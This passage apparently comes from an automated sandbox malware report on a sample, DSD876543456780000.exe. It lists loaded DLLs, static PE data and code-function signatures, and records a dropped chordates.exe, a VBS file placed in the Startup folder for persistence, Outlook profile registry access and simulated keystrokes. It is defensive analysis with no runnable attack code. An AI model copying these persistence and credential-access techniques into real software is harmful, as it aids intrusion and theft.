              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: DSD876543456780000.exeStatic file information: File size 1113600 > 1048576
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: DSD876543456780000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: DSD876543456780000.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: DSD876543456780000.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: DSD876543456780000.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: DSD876543456780000.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: DSD876543456780000.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C10A76 push ecx; ret 0_2_00C10A89
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF5C92 push 00000043h; ret 0_2_00BF5C94
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E80A76 push ecx; ret 2_2_00E80A89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004231C8 push eax; ret 3_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_076BE558 push eax; iretd 3_2_076BE559
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_07ACE558 push eax; iretd 6_2_07ACE559
              Source: C:\Users\user\Desktop\DSD876543456780000.exeFile created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbsJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C0F98E
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00C81C41
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00E7F98E
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00EF1C41
              Source: C:\Users\user\Desktop\DSD876543456780000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
